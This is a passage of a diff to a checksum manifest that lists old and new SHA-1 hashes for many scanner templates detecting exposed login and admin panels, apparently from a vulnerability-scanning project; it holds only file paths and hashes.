-http/exposed-panels/sqlbuddy-panel.yaml:3aeef92e05de1c61309867efc421dcc1ae108a3e -http/exposed-panels/squirrelmail-login.yaml:8b3b97c27f78ea6ae3315ccf9044e2a002a5e3c3 -http/exposed-panels/sqwebmail-login-panel.yaml:443337ed71f51587a8fba2471f2191386dd1298d -http/exposed-panels/star-network-utility.yaml:00185f86f1be39a7e02252c4cbabbae05c47b482 +http/exposed-panels/spotweb-login-panel.yaml:2f8144aba1b8c4559429e89f8c8a7934bf1abdf6 +http/exposed-panels/sql-monitor.yaml:453625d7471511aeefd9038fe4e01fa0e69d829c +http/exposed-panels/sqlbuddy-panel.yaml:7eb291c0826afccfadd50e1d7ab7cfb58acd7808 +http/exposed-panels/squirrelmail-login.yaml:2d891e4ecfbb4fc4cf309e34c55929f67d9a72b0 +http/exposed-panels/sqwebmail-login-panel.yaml:1cdb0dc176c74017cd83c493dcac2d8fe98af154 +http/exposed-panels/star-network-utility.yaml:2ebdcc5acce4aaeee0e0eb321cf0c0bca3074dce http/exposed-panels/start-element-manager-panel.yaml:19fe5f603b17d2230639f45ab735b3052e6e4a70 -http/exposed-panels/steve-login-panel.yaml:bcdb8e19ad9d97fc0b8579337d4b22080327f5b3 -http/exposed-panels/storybook-panel.yaml:1606d1bc4acdda35e1c62638064d956b762c0f88 -http/exposed-panels/strapi-documentation.yaml:5825d95cc0da934c34e36c864ca82d58cf050cff -http/exposed-panels/strapi-panel.yaml:90d6caf9226e85ae2f2279b4e4dd2a4602a1ac73 +http/exposed-panels/steve-login-panel.yaml:22b492a6f12f443449c84012ca8978d98ba86472 +http/exposed-panels/storybook-panel.yaml:31c0c246ddaa6a0f84b8cdfcefade0e936610a85 +http/exposed-panels/strapi-documentation.yaml:fa9a9f9b937ac0239a6c97a7be8dbd5076baa388 +http/exposed-panels/strapi-panel.yaml:fd45d9f3de6ec3bc991298c72da484f40bd35548 http/exposed-panels/stridercd-panel.yaml:ddd8b1d0b3b2879e45cb765856193cb2a6a393f0 -http/exposed-panels/structurizr-panel.yaml:b7c2901168d81cd82c1545a8cadfea954e470545 +http/exposed-panels/structurizr-panel.yaml:234a083c7e66c59729e982fa3f782113a4378b15 http/exposed-panels/submitty-login.yaml:b3e16957c18a5b79e0dc581bf5c220adff9ae060 -http/exposed-panels/subrion-login.yaml:9e09f87d453f0033b490207b5cf6bb786bbdb864 -http/exposed-panels/sugarcrm-panel.yaml:3560c226840d0cfc29fd3fd183fac326d71fd60e -http/exposed-panels/sunbird-dcim-panel.yaml:4c67d3697fc0c396ae355575e9e89226918fa518 -http/exposed-panels/sungrow-logger1000-detect.yaml:5ba97595b20d761527bd18cdb18af7aa78ebfbc9 -http/exposed-panels/superadmin-ui-panel.yaml:e155feb5e5e59e47685c507df0ecae851f7b4e24 -http/exposed-panels/supermicro-bmc-panel.yaml:eeccf17f09a09721ab2bcf9edc43696748db37b0 -http/exposed-panels/superset-login.yaml:21841c6b6d90d3e11cf599619d303356ee46b7f5 +http/exposed-panels/subrion-login.yaml:5a321eb103985a5b1d277f6e891ec6580d64c34f +http/exposed-panels/sugarcrm-panel.yaml:f821ad1306f121adbfa4b36c32511fab30f596e9 +http/exposed-panels/sunbird-dcim-panel.yaml:c31b99dbf3c5d5bae4731598d1f82b80b1673139 +http/exposed-panels/sungrow-logger1000-detect.yaml:90aa0827a88e6e196135d3d52607b423db129fab +http/exposed-panels/superadmin-ui-panel.yaml:2d7cf66476c0eab379ff0be75923bb31cbc57dc7 +http/exposed-panels/supermicro-bmc-panel.yaml:4017f5c1409c5db182000ce14b6cde06cd432035 +http/exposed-panels/superset-login.yaml:fb3a14d425080f2f145f6c4174c1574b92f3941d http/exposed-panels/supervpn-panel.yaml:804b354dd3820a04fb7f1e81d64837b773c22051 http/exposed-panels/suprema-biostar-panel.yaml:b6890949cfda75c2447ff23f461632fdea4e697e -http/exposed-panels/syfadis-xperience-panel.yaml:b397edd3d8662a3fdf2a14005a8f8e7c76a3e7a6 -http/exposed-panels/symantec/symantec-dlp-login.yaml:3959b92dba1f6a208c993ba5b4b9101aa7304921 -http/exposed-panels/symantec/symantec-epm-login.yaml:c3fcd4ab4f2ae28f28f5559653b972aeb2b95de2 +http/exposed-panels/syfadis-xperience-panel.yaml:e97215d1b4921c50b38b951ddb92937d49af3c21 +http/exposed-panels/symantec/symantec-dlp-login.yaml:39b28dc1a202a1c5afef12c064302c0400633932 +http/exposed-panels/symantec/symantec-epm-login.yaml:16b55b9d94cfc0c04f42710b18eed9d14fd7e8dd http/exposed-panels/symantec/symantec-ewep-login.yaml:7ac3becb9e8fb98d2481542c1df5f0e7beba2f06 -http/exposed-panels/symantec/symantec-iam-console.yaml:976f3bca7919660694b6a613894c58e27f01d619 +http/exposed-panels/symantec/symantec-iam-console.yaml:2f5b8e1685cc0d6768e4803717fa75d803a58320 http/exposed-panels/symantec/symantec-pgp-global-directory.yaml:e7ad6f23eefb01e5c995f7cf921a6f57470d25f3 -http/exposed-panels/symantec/symantec-phishing-panel.yaml:0bc1e5f5cb8b6a25339e6730d65594bbf6ce5928 -http/exposed-panels/synapse-mobility-panel.yaml:c3829487f694b1151688670f1f6fbac091cefd36 -http/exposed-panels/syncserver-panel.yaml:ff46a3adf86e42c7d2ba925b882ff8d7c4245f97 -http/exposed-panels/syncthru-web-service.yaml:3278ca744d998f78fa61f9b14e335d815d4ea8d2 +http/exposed-panels/symantec/symantec-phishing-panel.yaml:62e58f24c8032fd02b7993b6e0f736ae60a3b9f3 +http/exposed-panels/synapse-mobility-panel.yaml:c52464ead1dafa7be1e9d96858d6eb61f9c6a639 +http/exposed-panels/syncserver-panel.yaml:ea4e0c9755f8f171fe0b492f3a66716efe42f7bc +http/exposed-panels/syncthru-web-service.yaml:c7e089600c59050b6fedacd3397e5b8e08d2e7de http/exposed-panels/synnefo-admin-panel.yaml:f5dc0bef36641be7566bd405b8ec5c9bf219f454 http/exposed-panels/synology-rackstation-login.yaml:de3695e986f091051618b68ac7a6d883df2b94b7 -http/exposed-panels/synopsys-coverity-panel.yaml:7ccc3350fe7709e303435fe818585dda3ff7775d -http/exposed-panels/sysaid-panel.yaml:a7bf6291f20037c2bb82f0ae7537fce3e3ce60bc -http/exposed-panels/tableau-panel.yaml:44e2aafeed0f884e943ad6204f7276fdb38524d3 -http/exposed-panels/tableau-service-manager.yaml:e4dc0c6474aa8a500910b956e05400778cce38e5 -http/exposed-panels/tailon-panel.yaml:932dd429c4c6c0c653283e1ec18f21c33d1f658a -http/exposed-panels/tautulli-panel.yaml:b1e7c47f7d30fd55e28e49a0e08a4f1f2ee075df -http/exposed-panels/teamcity-login-panel.yaml:e4a0853683e0c6d7f25e8b4efa8ac9986c3efe68 -http/exposed-panels/teamforge-panel.yaml:8392c4b73a322e6c548d04f0a329f5920d81fe6a -http/exposed-panels/teampass-panel.yaml:b20c18ab358e4afa1b363e71e60469127a91b284 +http/exposed-panels/synopsys-coverity-panel.yaml:9313f7c265f72a239b538a964faaabe1cdcd6176 +http/exposed-panels/sysaid-panel.yaml:d2551340d621e28086742874457540e4e4201ad9 +http/exposed-panels/tableau-panel.yaml:ad0d08b16b7d85b6d20d05e9bd9567bbb79b65ae +http/exposed-panels/tableau-service-manager.yaml:e025e8404dc914a62f430f4535eda0b659ac85be +http/exposed-panels/tailon-panel.yaml:47d64b2c8899dd8632394641d28b9d9f7a222188 +http/exposed-panels/tautulli-panel.yaml:6a420877a8a5c83b45ced69d31eae6aa2c44b2ed +http/exposed-panels/teamcity-login-panel.yaml:a399d30273d2f9e84982b4795620ff0edd6dd6b9 +http/exposed-panels/teamforge-panel.yaml:ede0c70b126dd98f84d356e355e3eaa5dc099af7 +http/exposed-panels/teampass-panel.yaml:987d715fd50678e6bc5a1061995de8cef614fe29 http/exposed-panels/tectuus-scada-monitor.yaml:2eb28ad9aac490c62d5a0be1004874ce40bce294 -http/exposed-panels/tekton-dashboard.yaml:5af9080f654df96d79406a398e81f2a7a8117224 -http/exposed-panels/telerik-server-login.yaml:e6797f2c6599f688ef35dff594ca7f00d785939c -http/exposed-panels/telesquare/tlr-2005ksh-login.yaml:ffd34b50daa9acafdc816086a9e1cf3ba2da703b -http/exposed-panels/teltonika-login.yaml:69e45c9cf9b3e99b955e3a0bab4300bd90a583b3 -http/exposed-panels/tembosocial-panel.yaml:c4298005b8af4b92d8ab52917018a562300624aa +http/exposed-panels/tekton-dashboard.yaml:6b0a2a628a4ed348c7e58f5da6f63c1428289788 +http/exposed-panels/telerik-server-login.yaml:8141a61719b185e78d1ab5a82a89581c59f86a2f +http/exposed-panels/telesquare/tlr-2005ksh-login.yaml:3a83b52ff3473dde1120fbcba2c835c0cac88a7b +http/exposed-panels/teltonika-login.yaml:fe02e639793c46e014418babe4d9f7ca5156ff05 +http/exposed-panels/tembosocial-panel.yaml:50234a00fda5490271a2cb5c2af2c77de16a528a http/exposed-panels/temenos-t24-login.yaml:354c02a0ef7f13d7bcd4a592d89e0371c848b300 -http/exposed-panels/tenda-11n-wireless-router-login.yaml:5af5628a38f4555584565cd4d41fe205bb8e2e32 -http/exposed-panels/tenda-web-master.yaml:6b37928da4b0580b87d46be7fe4e57ed90a4f08c -http/exposed-panels/teradek-panel.yaml:e78388cba6ca18d3aeea31dbb6ed2ce8ade273c6 -http/exposed-panels/teradici-pcoip-panel.yaml:8abb40365a9a9aaa3b57a32ae3ecc26272a0971f -http/exposed-panels/terraform-enterprise-panel.yaml:9b673fd74d4c4ce50f896831eebbd68d002bd4e3 +http/exposed-panels/tenda-11n-wireless-router-login.yaml:70f8c08336523d40e026e86392504f327b163b6b +http/exposed-panels/tenda-web-master.yaml:3e8ff64f4274e2f8dde46e6b581e70676890973e +http/exposed-panels/teradek-panel.yaml:3cdb376d868be38db0dc3ffeeaf9aca88f3bf5f6 +http/exposed-panels/teradici-pcoip-panel.yaml:7eb62c3534faaa3faf1a4d0279b52767bd2ae8d4 +http/exposed-panels/terraform-enterprise-panel.yaml:8dfe81d7992884d71de50d28eb54c24ac09fab6d http/exposed-panels/terramaster-login.yaml:4406c43cbe50e12b8adfac92160e5023cafc4642 -http/exposed-panels/thinfinity-virtualui-panel.yaml:4844990acb26b0bc8ba4b18ce633c9c23f430f97 +http/exposed-panels/thinfinity-virtualui-panel.yaml:1581a7f5bd5f6d296a746279b6d46520126b1435 http/exposed-panels/threatq-login.yaml:8ef069262943e44fd75b10921203dacdd9fdefa1 -http/exposed-panels/thruk-login.yaml:54904d4322613ad0d384c7fc072247dc532011e1 -http/exposed-panels/tibco-spotfire-panel.yaml:7abc1e8affa4065623831a8dfa9ebcc5f3de0696 -http/exposed-panels/tigase-xmpp-server.yaml:75dcbfb91190aa716fb8894a26fad88ebcf1c4b4 -http/exposed-panels/tikiwiki-cms.yaml:704f538632b5890953ff4ee1550305c9b6f9bcc4 -http/exposed-panels/tiny-file-manager.yaml:5227b4eaf964e71cb70ca203584d07e6abfcb4d9 -http/exposed-panels/tiny-rss-panel.yaml:de8fb04fcf6c23c02809fccfb37249b02a89aa14 -http/exposed-panels/tixeo-panel.yaml:c4d4bdf1928f96106840072e7921b6914df9b2d1 -http/exposed-panels/tomcat/tomcat-exposed-docs.yaml:83eeb31ba321516ebf82f3d494663984d7b9a0bc -http/exposed-panels/tooljet-panel.yaml:3769667dde0edf58291e63302ba316456c70b37d -http/exposed-panels/total-web-solutions-panel.yaml:b3575d91535713b5c8056f70a8b9d9821d56c58f -http/exposed-panels/totemomail-panel.yaml:2cf3074483c4499da21ca85b0f18154582439aa1 -http/exposed-panels/tracer-sc-login.yaml:e72d801e9575201a1091c3245791777104d196f8 -http/exposed-panels/traefik-dashboard.yaml:dc1be15e54b4604e5465ea4712f23745a099ae9d -http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml:88ba139867b2cb277525dccecb45732fceec0b8f -http/exposed-panels/truenas-scale-panel.yaml:f04e44a051b3feac0971705594a8d485a5bfe9b3 -http/exposed-panels/tufin-securetrack-login.yaml:196cd9acd4b13c05ebc6d455e39891a4a4f73909 -http/exposed-panels/tup-openframe.yaml:808bfd74aecca717c09d60f58ab80fd51fa6e9bd -http/exposed-panels/turnkey-openvpn.yaml:39c452eb93078b6a3c5c3b7f7789fba65fb9dbf2 +http/exposed-panels/thruk-login.yaml:d90f754022eaea84910020ddebb65342c2884d7d +http/exposed-panels/tibco-spotfire-panel.yaml:d19260f4d397037b373d7de30d0eba535bf0a667 +http/exposed-panels/tigase-xmpp-server.yaml:56d25007c5248e34796c5006f349554ff91c7888 +http/exposed-panels/tikiwiki-cms.yaml:f5965dd6df4a409f7933d0e341127bebe40c62a6 +http/exposed-panels/tiny-file-manager.yaml:473403bf6623892649edb97faee735730fe8bece +http/exposed-panels/tiny-rss-panel.yaml:99099323bc475af2879fa4e341af15de945b6a16 +http/exposed-panels/tixeo-panel.yaml:dc53279b65067a426f315612e84a6b33610d065c +http/exposed-panels/tomcat/tomcat-exposed-docs.yaml:fe13d3ae248e03688eba6665e23feeea5929b7f5 +http/exposed-panels/tooljet-panel.yaml:6508dcddc21a109b5d6fac690320b76509e1e3f0 +http/exposed-panels/total-web-solutions-panel.yaml:cb777be4acfadd2e81219934dd90afec078ee897 +http/exposed-panels/totemomail-panel.yaml:0e81892a7b0ff9579624dcd3ad1d1a0391bcb233 +http/exposed-panels/tracer-sc-login.yaml:db6ce51c6be9950dcd58e8f4971d8052b1980a04 +http/exposed-panels/traefik-dashboard.yaml:479ce83869bc265263df2842822ff4e300ff0275 +http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml:22922e12703c9e8bd7a6615878339d90052d2424 +http/exposed-panels/truenas-scale-panel.yaml:4bb3b855e11430fac50a2599f6a014628129910e +http/exposed-panels/tufin-securetrack-login.yaml:f6d2800d2273eae1e6ab906d35bd33ec738b931f +http/exposed-panels/tup-openframe.yaml:de029d2a04450c6307c03647ac543e7ead5a4430 +http/exposed-panels/turnkey-openvpn.yaml:a23c719ef31a302abeef7c1192e56b0bbd4f9c48 http/exposed-panels/tuxedo-connected-controller.yaml:ee4f09412b94ae739070bf2b62882f835d9f0767 -http/exposed-panels/typo3-login.yaml:72cfd4ea09b641aada781d8217ae54a23b88a0cd -http/exposed-panels/uipath-orchestrator-panel.yaml:af4705f7f98e419ceddff8130581d58ce6028339 +http/exposed-panels/typo3-login.yaml:a4cb69a1e6188c1bb61d9a31e827495a589f9596 +http/exposed-panels/uipath-orchestrator-panel.yaml:0966ab57eeee1eac0545a21d38aa619f28e9df40 http/exposed-panels/umami-panel.yaml:f6551441a99dfa7eae097d14e7adc8122ce8cb8d -http/exposed-panels/umbraco-login.yaml:fdfd46a20aa2721ffa8784101d3b1b69f2393ea7 -http/exposed-panels/unauth/tautulli-unauth.yaml:091217f1b5773c345e63401e05aa540485af4672 -http/exposed-panels/unauth-xproxy-dashboard.yaml:c01ec537b431a19a6379b6616d1656cb6081b84a +http/exposed-panels/umbraco-login.yaml:b0ac59c93624826758bcc4efb31d912092e76734 +http/exposed-panels/unauth/tautulli-unauth.yaml:b6c3bd37c924ba31139cbbc25bd8a79a1f16abb1 +http/exposed-panels/unauth-xproxy-dashboard.yaml:f33b71c3f9acc1bc7d5fd315d0682563c72c834b http/exposed-panels/unauthenticated-frp.yaml:7dce249491443ca0f4d7954e2a0fed07a90418d6 -http/exposed-panels/unibox-panel.yaml:cdf9eb8ff2bb47a65d41b11e01c20e80e129fc42 +http/exposed-panels/unibox-panel.yaml:bf3f47e1158708eac3b0113f1e54ae8dfd93cd6a http/exposed-panels/unifi-panel.yaml:7453d0729a5fd66914347f5ee4a41a958b05cd1e -http/exposed-panels/unleash-panel.yaml:be51937dd1d4f1ac7feadf1883b3026016d08f53 -http/exposed-panels/untangle-admin-login.yaml:e608572d5f228bc2af5c784d0944ec5cd7e6174b -http/exposed-panels/uptime-kuma-panel.yaml:422d9cf4aa37790f9729c374453d9a4c7a3cfa88 +http/exposed-panels/unleash-panel.yaml:13fbcb2a703922820207055621b375f4991a93b8 +http/exposed-panels/untangle-admin-login.yaml:fd27aed503201fde81d80f7e3119800c567838c5 +http/exposed-panels/uptime-kuma-panel.yaml:f2c7824cfa0f07c0770433b67fc120a9ca9539eb http/exposed-panels/urbackup-panel.yaml:907afaf682a672c3770668b8c640cbf7bb233d8a http/exposed-panels/user-control-panel.yaml:5b43e1f426bb7b526af0d8ccb823c7e66a462c4d -http/exposed-panels/v2924-admin-panel.yaml:4a2d30c3cec92f5e7dda0bb1ba5546cf3f0fe2dc -http/exposed-panels/vault-panel.yaml:5457449afaba8c2e27499d65917886a730b5a560 +http/exposed-panels/v2924-admin-panel.yaml:52e5b61d18c0cf5c2d2a24de8a58d4802724b98e +http/exposed-panels/vault-panel.yaml:8970086c03e3e2063bb1c14d806e803b40545203 http/exposed-panels/veeam-backup-azure-panel.yaml:986e549ba8272b1fb4f420b0d61688e6c75bbe1b -http/exposed-panels/veeam-backup-gcp.yaml:ec91dd2c5b42b3925491dc7fc9f896e91805d85d +http/exposed-panels/veeam-backup-gcp.yaml:19fc4b6e2accbabe5fb6722619f903edf3365613 http/exposed-panels/veeam-panel.yaml:ef98410c87107e18e3d656564a62ff6b7c3b0641 -http/exposed-panels/veriz0wn-osint.yaml:cfd1414b105633b1ddded718530e15d20e72ea03 -http/exposed-panels/verizon-router-panel.yaml:7a70257fc6170970019d7a0923f33856c5570703 -http/exposed-panels/versa/versa-director-login.yaml:ec8561d3047534723bbef9853c197c6a8d366df5 -http/exposed-panels/versa/versa-flexvnf-panel.yaml:1398081e795c28ad59cae6366ac411915b3d50af +http/exposed-panels/veriz0wn-osint.yaml:7478c11b7db96276f2c22eeb1815dc9b8420a80c +http/exposed-panels/verizon-router-panel.yaml:0cade7ae1734b8550e3d5bcec09466c0d3748b25 +http/exposed-panels/versa/versa-director-login.yaml:8f24c1b9480fe4573d2aa143e31f714ce2ee27f8 +http/exposed-panels/versa/versa-flexvnf-panel.yaml:4e87d106123ec21ad90159a6a2f3dadace07ea70 http/exposed-panels/versa/versa-sdwan.yaml:764d9847bc2936ffe0c2543e76ee106f623a9a91 -http/exposed-panels/vertex-tax-panel.yaml:ce106aa401bdcc3143c6b1cb2d107d6d28210972 +http/exposed-panels/vertex-tax-panel.yaml:4fda3479ea3eaf8db1a919b28ef9fb2575c21b73 http/exposed-panels/vidyo-login.yaml:e8732736c6ac1036bfb83b0b74caaf3152efe5b7 http/exposed-panels/vigor-login.yaml:dad14fa3849ff6ea9a58ffb3709424294d6aceab -http/exposed-panels/vinchin-panel.yaml:d5c0383e06efc5f1871f7a6368ee252a4d24e882 -http/exposed-panels/virtua-software-panel.yaml:68924bf6ef15cf8c0fab6e06fb2cc874cfaa8229 +http/exposed-panels/vinchin-panel.yaml:75e48a1fbbe09471c65defb66d4862fb10a40218 +http/exposed-panels/virtua-software-panel.yaml:3d1a2020578e7f9f4391bfbf12c29aab05532f4e http/exposed-panels/virtual-ema-detect.yaml:02b9fdcff2c9183effa7675ef1e9b18df5c9e918 -http/exposed-panels/vistaweb-panel.yaml:1f9c8276f1dcad4b1b6663ed87afb21a08ee723d -http/exposed-panels/vmware-carbon-black-edr.yaml:f4d1040ec5a7b991607d1e1fd872b1b5e53e746e -http/exposed-panels/vmware-cloud-availability.yaml:a66e8c747d4833b67900be66c85fd154125c05a5 -http/exposed-panels/vmware-cloud-director.yaml:c2994e8257a0c0a4ffa084073e79f1bce5edffd9 -http/exposed-panels/vmware-ftp-server.yaml:7934b495209f778cb6c433b3feb180eebb40fb5c -http/exposed-panels/vmware-hcx-login.yaml:f05b9d187e472d1b3f9ce9aa9e3620ecde345366 -http/exposed-panels/vmware-horizon-daas.yaml:a704255f5bd1d2d9d1aea0a1384e9eaf65eb8968 -http/exposed-panels/vmware-horizon-panel.yaml:8cc9b931ef956545cc6d1cabcec2f92a967c467b -http/exposed-panels/vmware-nsx-login.yaml:dde0a87373120016744a61a43e7bae42d1f8e96e -http/exposed-panels/vmware-vcenter-converter-standalone.yaml:afd6381e2632114b860dbf8d34b7cc8dc1119550 -http/exposed-panels/vmware-vcloud-director.yaml:1cc3968a991cd6cc1df9ef69bce9855ce0263481 -http/exposed-panels/vodafone-voxui-panel.yaml:8c1897eb27b8ad1df6322dcfff01cfe403fc7e94 -http/exposed-panels/voipmonitor-panel.yaml:e71536ce7d33bdb21196e43d271599461210c00c +http/exposed-panels/vistaweb-panel.yaml:32a825daf211579302d0bda7342bc3b83dc0e5c8 +http/exposed-panels/vmware-carbon-black-edr.yaml:6252a95f440180440b1129f3dc211407653c6770 +http/exposed-panels/vmware-cloud-availability.yaml:3d614a855aa4f888bf2c219aec20a6ba21ac674a +http/exposed-panels/vmware-cloud-director.yaml:1b4cb53b18ecc9e49aeadfc42b41e1f0b07e7edd +http/exposed-panels/vmware-ftp-server.yaml:3a6d54994a4db73ac7ba303d30b3df89d44bf1f7 +http/exposed-panels/vmware-hcx-login.yaml:771cdb5f830689ce8ba0414067358890070541b4 +http/exposed-panels/vmware-horizon-daas.yaml:4b757ac93dfc1f34aed2bd97877e40f3fc1900b5 +http/exposed-panels/vmware-horizon-panel.yaml:bba3c2b0ee67793696ad14f429223cdf820fc274 +http/exposed-panels/vmware-nsx-login.yaml:1dea9b68f812fe1b4442832f59f6eda5f338fb48 +http/exposed-panels/vmware-vcenter-converter-standalone.yaml:253fa946300334e910cbe9860ee5398312b376c1 +http/exposed-panels/vmware-vcloud-director.yaml:ff4803a50e53b6cb062534b24d1d986fb85d1db2 +http/exposed-panels/vodafone-voxui-panel.yaml:f3c8faadc44db8a7ce8792fc71523caad85e1833 +http/exposed-panels/voipmonitor-panel.yaml:65323e4848c9115437d1a622fe4a7e8b174116e1 http/exposed-panels/vrealize-hyperic-login-panel.yaml:da4dd0d80ada82ae2cad2905b60b7171c6887bd7 -http/exposed-panels/vrealize-loginsight-panel.yaml:fd0b96b27df826ead5e909036f608a45b8fdee99 -http/exposed-panels/vue-pacs-panel.yaml:a9409187ebedd24db1b6fe057b87c234ba5cf34a +http/exposed-panels/vrealize-loginsight-panel.yaml:2354fdb4f7cfdf4a482d10193b4e6f10204c702a +http/exposed-panels/vue-pacs-panel.yaml:5e696f80cc1be77e0b772e8b17b8bb81d8cc9359 http/exposed-panels/wago-plc-panel.yaml:408e8ec5941005afb61d1f1b11501fefcf33b946 -http/exposed-panels/wagtail-cms-detect.yaml:9b4d05785bf186cd074530817606c08be68a1830 +http/exposed-panels/wagtail-cms-detect.yaml:4f13c91ee6455860edc877e4ef4b96c6e3897fb5 http/exposed-panels/wallix-accessmanager-panel.yaml:feaf5dd823b02e322eb08d74c46064eefa7b7955 -http/exposed-panels/wampserver-homepage.yaml:cbef7c81b49348cb7269a3c3f480873fc6895889 -http/exposed-panels/watcher-panel.yaml:9845f72adcf7b9cdb135880500e3e1e9b658108d -http/exposed-panels/watchguard-panel.yaml:008572fdfa26404e6449aa61a50835cc68f0982b -http/exposed-panels/watershed-panel.yaml:3b5ce1a5a60a36de26e02af50ca1aadb5748a60c -http/exposed-panels/wazuh-panel.yaml:d1074290ac5d4de95131f106d46ed05195cf60ed -http/exposed-panels/wd-mycloud-panel.yaml:fbd9227b4afad5b0e470213f9641fd0f4bcb7a94 +http/exposed-panels/wampserver-homepage.yaml:5b8f3bac7210fac5f3a738aed5e410ef2038367c +http/exposed-panels/watcher-panel.yaml:38eeb836b7b1dc9c08700feac6c08a7fe6ee9396 +http/exposed-panels/watchguard-panel.yaml:6dbd0dbb575a3bcfe597b20ff14359bab24d6495 +http/exposed-panels/watershed-panel.yaml:da612b3b84c46639baa6ab228924605d8059b7cf +http/exposed-panels/wazuh-panel.yaml:0f46d0b4bef2f8632cb5c6d1c2687e3e0f4a5be2 +http/exposed-panels/wd-mycloud-panel.yaml:aabfca9eccd393c6b1a0db77bfc3a4549a74ffd3 http/exposed-panels/weatherlink.yaml:61171960d11dfd6b634883e8a828825611cc1b22 http/exposed-panels/weave-scope-dashboard.yaml:15f951252a81a9039b480e27888e7668fb75004f -http/exposed-panels/web-file-manager.yaml:e9b97948b767c1d0412237ab06767d66d3b70fa2 +http/exposed-panels/web-file-manager.yaml:8c451ffeb7e02c1561d686b2569e053882513e5d http/exposed-panels/web-local-craft.yaml:17ecbaba7191f05758350a239403ecc5ddc9386f -http/exposed-panels/web-viewer-panel.yaml:f6fab10d49a33459ddadf7aed1ea40f30186fe8f -http/exposed-panels/webcomco-panel.yaml:4c62d3c21b920a31d31d89f6415fc5bb71648139 -http/exposed-panels/webeditors-check-detect.yaml:cf5a07c9e236342f4bb5cb75d56e3f6899546247 -http/exposed-panels/weblogic-login.yaml:568b22cc411c8cb0a3043d8e0673b7d26d2d913c -http/exposed-panels/weblogic-uddiexplorer.yaml:2e42fb8cb9217a3c04180aa6979fa6986eba26ed -http/exposed-panels/webmin-panel.yaml:adddcfa9a6eeef7f541a2a0bbc0e62eae7a1ed1d -http/exposed-panels/webmodule-ee-panel.yaml:46176c27be760f20a15ca636e50c42477157bbb7 +http/exposed-panels/web-viewer-panel.yaml:49cdd815b7ed9dc27ad47081f40868140fdac86b +http/exposed-panels/webcomco-panel.yaml:6d1f3463bfad14644c871f22c0ac9dad56248252 +http/exposed-panels/webeditors-check-detect.yaml:115d430f908ff9df224e424bda4976b7d96ef52d +http/exposed-panels/weblogic-login.yaml:8adea78734b7fe52c5ebebf64c393bfcd3bd05f0 +http/exposed-panels/weblogic-uddiexplorer.yaml:6eaf5c854beb8e57ec4f197626df88ca04412ad0 +http/exposed-panels/webmin-panel.yaml:b788be5764c9deb4f707b16423d9edbe10e6f353 +http/exposed-panels/webmodule-ee-panel.yaml:afc3974c6dbf79c254e9546c065fd3b11c364b84 http/exposed-panels/webpagetest-panel.yaml:3b7d0c81f7645e41c7f85e6056ed6a9582b1fcc5 -http/exposed-panels/webroot-login.yaml:2aa3bfcd1fdfc3e9f2437ee3ec9fbb9ae5d168fe -http/exposed-panels/webshell4-login-panel.yaml:6b3be238d5711df97bad65d28bb32ce13c3ff7be -http/exposed-panels/webtitan-cloud-panel.yaml:fa2185caa5721d94ec3c792e6555dfd068ef2397 -http/exposed-panels/webtransfer-client-panel.yaml:c464658169660cab63685e157c6132e872d9864c -http/exposed-panels/webuzo-admin-panel.yaml:c1fd38a051fb35fb35290c9375ccf1ba3da7d7b9 -http/exposed-panels/weiphp-panel.yaml:fa2a75bdd69d642f36cab9cd33b51ea0fe6f46c9 -http/exposed-panels/whm-login-detect.yaml:a8b162ebcbc15774977b6f45482cf70ce9268107 -http/exposed-panels/wiren-board-webui.yaml:2ec12f6618fe38ee67b2082bfb4c6789f9c1a32c -http/exposed-panels/wmw-enterprise-panel.yaml:2c441bf75824d1bb9663911ee89e48affc662b79 +http/exposed-panels/webroot-login.yaml:cab4fe81c326f51ffde081858b727d80df58b142 +http/exposed-panels/webshell4-login-panel.yaml:5d6d9c3a21bf3a7719b41ecab4fccc98d16bdc1c +http/exposed-panels/webtitan-cloud-panel.yaml:08964307b6633875114d2c59fffe1cd9ef776143 +http/exposed-panels/webtransfer-client-panel.yaml:3bdc03f237b3c7d67f5b5c5cc1fa868e899001e4 +http/exposed-panels/webuzo-admin-panel.yaml:2a23dfafdc35ba3c503b77e7148b839f1cba9040 +http/exposed-panels/weiphp-panel.yaml:228a360dff16728045d0f9bbaae24a6ab4b07538 +http/exposed-panels/whm-login-detect.yaml:aba72c245c8e8393019b308856432b3a783861fb +http/exposed-panels/wiren-board-webui.yaml:e95f3caf610b91a741ebdee0a3a311766c73a3c7 +http/exposed-panels/wmw-enterprise-panel.yaml:929b8eaf8398d8088610c0d2879945795d0309fb http/exposed-panels/woodwing-panel.yaml:d942acdcb220526e73ff3c3ec78289807bd0e1f1 -http/exposed-panels/wordpress-login.yaml:c0af570b2bfbde00e6b57895da3c389b748740a9 +http/exposed-panels/wordpress-login.yaml:34621b83595d281033e1df6bb4141af3cfc18fb1 http/exposed-panels/workresources-rdp.yaml:6a54b472af88df3e926f984a8bd3fa48e2380a05 -http/exposed-panels/workspace-one-uem.yaml:f420ff69dc1bd9f3c966fef1de97d5ce2f467773 -http/exposed-panels/wowza-streaming-engine.yaml:90adec4389316b0ea2a5ea6583d5a06cf5dd7a82 -http/exposed-panels/ws_ftp-server-web-transfer.yaml:6b4c8c5e6ff6c2ce0c1874e0d31513a767e8d12f -http/exposed-panels/wso2-management-console.yaml:2a9216c7b65f5024da28da21f6a92c2bc4f424da +http/exposed-panels/workspace-one-uem.yaml:300e56b151ffd4998ae6da5142344f431c10fa72 +http/exposed-panels/wowza-streaming-engine.yaml:846144d3968f28d252cee8e58e59a52d2e644b07 +http/exposed-panels/ws_ftp-server-web-transfer.yaml:7e82e08315b30516d65e3a055ac4d8e35d19900d +http/exposed-panels/wso2-management-console.yaml:9212e9e12241f73ce3e6006203ad3ccbf3362f6b http/exposed-panels/xds-amr-status.yaml:dd152a8f62710723e761801c35fe84b4f0e268dd -http/exposed-panels/xeams-admin-console.yaml:b36a65f91b6474c432c02b16c742850c03f172fd -http/exposed-panels/xenmobile-login.yaml:d96e8da6e446fdead7b02cdeeddc5e08965ae033 -http/exposed-panels/xfinity-panel.yaml:03b93b889ff8fef16314f4bdbc27ffa4ae00f82d +http/exposed-panels/xeams-admin-console.yaml:a9092591e719d01eca4cc1d284214cecca37b65e +http/exposed-panels/xenmobile-login.yaml:f3927461e73106ba158a9570a74b76aedcd13906 +http/exposed-panels/xfinity-panel.yaml:c7efc14e77973e342d366e1e7e467620ed8f7110 http/exposed-panels/xiaomi-wireless-router-login.yaml:a82f257d004f1ab2c1896cd979378695bd6746fa -http/exposed-panels/xibocms-login.yaml:d3e997457747d8abd6b6df566aa5609f2315904b 